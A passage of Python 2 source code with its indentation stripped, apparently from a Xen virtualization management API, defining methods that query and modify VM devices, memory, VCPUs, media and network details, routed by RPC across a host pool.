return self._VM_get_memory_static_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_max', vm_ref)
else:
return self._VM_get_memory_static_max(session, vm_ref)
def _VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_max())
def VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static min.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_static_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_static_min', vm_ref)
else:
return self._VM_get_memory_static_min(session, vm_ref)
def _VM_get_memory_static_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static min.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_static_min())
def VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VIFs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VIFs", vm_ref)
else:
return self._VM_get_VIFs(session, vm_ref)
def _VM_get_VIFs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VIFs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VIFs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vifs())
def VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VBDs(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_VBDs", vm_ref)
else:
return self._VM_get_VBDs(session, vm_ref)
def _VM_get_VBDs(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM VBDs.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vbds())
def VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_usb_scsi(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_usb_scsi", vm_ref)
else:
return self._VM_get_usb_scsi(session, vm_ref)
def _VM_get_usb_scsi(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM usb scsi devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[3]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_fibers(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_fibers", vm_ref)
else:
return self._VM_get_fibers(session, vm_ref)
def _VM_get_fibers(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM fiber devices(VBD), the backend is /dev/XXX.
@param session: session of RPC.
@param vm_ref: uuid.
@return: VBDs.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[2]) == 0:
#log.debug('fibers: %s' % vbd)
result.append(vbd)
return xen_api_success(result)
def VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_usb_scsi", vm_ref, vbd_ref)
else:
return self._VM_destroy_usb_scsi(session, vm_ref, vbd_ref)
def _VM_destroy_usb_scsi(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM usb scsi device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_destroy_fiber(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_fiber(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_fiber", vm_ref, vbd_ref)
else:
return self._VM_destroy_fiber(session, vbd_ref)
def _VM_destroy_fiber(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM fiber device(VBD) by vbd uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise VDIError: Cannot destroy VDI with VBDs attached
'''
storage = self._get_BNStorageAPI_instance()
vdi_ref = self.VBD_get_VDI(session, vbd_ref).get('Value')
response = self.VBD_destroy(session, vbd_ref)
if vdi_ref:
storage.VDI_destroy(session, vdi_ref)
return response
def VM_enable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_enable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_enable_media", vbd_ref)
else:
return self._VM_enable_media(session, vbd_ref)
def _VM_enable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Enable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 1)
return response
def VM_disable_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vm_ref: uuid.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_disable_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_disable_media", vbd_ref)
else:
return self._VM_disable_media(session, vbd_ref)
def _VM_disable_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Disable VM's media device(cdrom device).
@precondition: VM not running
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
'''
response = self.VBD_set_bootable(session, vbd_ref, 0)
return response
def VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_eject_media(session, vm_ref, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_eject_media", vm_ref, vbd_ref)
else:
return self._VM_eject_media(session, vm_ref, vbd_ref)
def _VM_eject_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Internal method. Eject VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
node = XendNode.instance()
if not node.is_fake_media_exists():
self._fake_media_auto_create(session)
# if not os.path.exists(FAKE_MEDIA_PATH):
# os.system("touch %s" % FAKE_MEDIA_PATH)
response = self._VM_media_change(session, vm_ref, FAKE_MEDIA_NAME)
return response
def VM_destroy_media(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_media(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_media", vm_ref, vbd_ref)
else:
return self._VM_destroy_media(session, vbd_ref)
def _VM_destroy_media(self, session, vbd_ref):
'''
@author: wuyuewen
@summary: Destroy VM's media device(cdrom device).
@param session: session of RPC.
@param vbd_ref: VBD's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
response = self.VBD_destroy(session, vbd_ref)
return response
def VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_destroy_VIF", vm_ref, vif_ref)
else:
return self._VM_destroy_VIF(session, vm_ref, vif_ref)
def _VM_destroy_VIF(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Destroy VM's VIF device(network device).
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF's uuid.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID
'''
# self._VM_del_ip_map(session, vm_ref, vif_ref)
response = self.VIF_destroy(session, vif_ref)
return response
def VM_get_available_vbd_device(self, session, vm_ref, device_type = 'xvd'):
'''
@author: wuyuewen
@summary: Use at pre-create of VBD device, return the device name(xvdX/hdX) that can use.
@precondition: The available interval is xvda-xvdj/hda-hdj, limit total 10 devices.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_available_vbd_device", vm_ref, device_type)
else:
return self._VM_get_available_vbd_device(session, vm_ref, device_type)
def _VM_get_available_vbd_device(self, session, vm_ref, device_type):
'''
@author: wuyuewen
@summary: Internal method. Use at pre-create of VBD device, return the device name(xvdX/hdX) that can use.
@precondition: The available interval is xvda-xvdj/hda-hdj, limit total 10 devices.
@param session: session of RPC.
@param vm_ref: uuid
@param device_type: xvd/hd.
@return: available device name.
@rtype: dict.
@raise xen_api_error: DEVICE_OUT_OF_RANGE, NO_VBD_ERROR
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value')
if vbds:
if cmp(len(vbds), DISK_LIMIT+1) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
vbds_first_device = self.VBD_get_device(session, vbds[0]).get('Value')
if vbds_first_device.startswith('hd'):
device_list = copy.deepcopy(VBD_DEFAULT_DEVICE)
else:
device_list = copy.deepcopy(VBD_XEN_DEFAULT_DEVICE)
for vbd in vbds:
device = self.VBD_get_device(session, vbd).get('Value')
if device and device in device_list:
device_list.remove(device)
else:
continue
if device_list:
return xen_api_success(device_list[0])
else:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VBD'])
else:
return xen_api_error(['NO_VBD_ERROR', 'VM', vm_ref])
def VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_media(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_media", vm_ref)
else:
return self._VM_get_media(session, vm_ref)
def _VM_get_media(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@return: VBD
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = None
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "<none/>")
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
result = vbd
break
if result:
return xen_api_success(result)
else:
'''
if VM has no media device, create a fake one.
'''
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
node = XendNode.instance()
if not node.is_fake_media_exists():
vdi = storage._fake_media_auto_create(session).get('Value')
else:
vdi = storage._VDI_get_by_name_label(session, FAKE_MEDIA_NAME).get("Value")
vbd_struct["VDI"] = vdi
return self.VBD_create(session, vbd_struct)
def _VM_get_disks(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[1]) == 0:
result.append(vbd)
return xen_api_success(result)
def VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_media_change(session, vm_ref, vdi_name)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_media_change", vm_ref, vdi_name)
else:
return self._VM_media_change(session, vm_ref, vdi_name)
def _VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Internal method. Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
vbd_ref = self._VM_get_media(session, vm_ref).get('Value')
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
log.debug("No media, create one.")
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
self.VBD_create(session, vbd_struct)
# return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
'''
Check the VBD is a media device or not.
'''
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
vdi_uuid = xennode.get_vdi_by_name_label(vdi_name)
new_vdi = xennode.get_vdi_by_uuid(vdi_uuid)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vdi_name])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = vdi_uuid
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
# if str(e).endswith("VmError: Device"):
# log.debug("No media create new...")
# log.debug(new_vbd_struct)
# self.VBD_create(session, new_vbd_struct)
return xen_api_error(['INTERNAL_ERROR', str(e)])
# return xen_api_success_void()
return xen_api_success_void()
def VM_get_VTPMs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vtpms())
def VM_get_consoles(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_consoles(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_consoles", vm_ref)
else:
return self._VM_get_consoles(vm_ref)
def _VM_get_consoles(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_consoles())
def VM_get_DPCIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dpcis())
def VM_get_DSCSIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsis())
def VM_get_DSCSI_HBAs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsi_HBAs())
def VM_get_tools_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_tools_version()
def VM_get_metrics(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_metrics())
#frank
def VM_get_cpu_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_cpu_qos())
#frank
def VM_get_network_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_network_qos())
def VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_max(_, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_max', vm_ref)
else:
return self._VM_get_VCPUs_max(_, vm_ref)
def _VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.info['VCPUs_max'])
def VM_get_VCPUs_at_startup(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VCPUs' bounding CPUs.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_CPU(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_CPU', vm_ref)
else:
return self._VM_get_VCPUs_CPU(session, vm_ref)
def _VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VCPUs' bounding CPUs.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsCPU())
def VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's ip address.
@precondition: VM must install VM-tools first.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_ip_addr(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_ip_addr', vm_ref)
else:
return self._VM_get_ip_addr(session, vm_ref)
def _VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's ip address.
@precondition: VM must install VM-tools first.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainIp())
def VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_MAC(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_MAC', vm_ref)
else:
return self._VM_get_MAC(session, vm_ref)
def _VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainMAC())
def VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vnc_location(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vnc_location', vm_ref)
else:
return self._VM_get_vnc_location(session, vm_ref)
def _VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
xendom = XendDomain.instance();
dom = xendom.get_vm_by_uuid(vm_ref)
# consoles = dom.get_consoles()
# vnc_location = "0"
# for console in consoles:
# location = xendom.get_dev_property_by_uuid('console', console, 'location')
# log.debug("vm %s console %s location %s" % (vm_ref, console, location))
# if location.find(".") != -1:
# vnc_location = location
vnc_location = dom.get_console_port()
log.debug('VM(%s) get vnc location (%s)' % (vm_ref, vnc_location))
return xen_api_success(vnc_location)
# attributes (rw)
def VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_label(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_label', vm_ref)
else:
return self._VM_get_name_label(session, vm_ref)
def _VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getName())
def VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_description(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_description', vm_ref)
else:
return self._VM_get_name_description(session, vm_ref)
def _VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getNameDescription())
def VM_get_user_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_todo()
def VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
@summary: Get VM is a template or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_a_template(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_a_template', ref)
else:
return self._VM_get_is_a_template(session, ref)
def _VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM is a template or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
log.debug('ref:%s' % ref)
try:
return xen_api_success(XendDomain.instance().get_vm_by_uuid(ref).info['is_a_template'])
except KeyError:
return xen_api_error(['key error', ref])
def VM_get_is_local_vm(self, session, ref):
'''
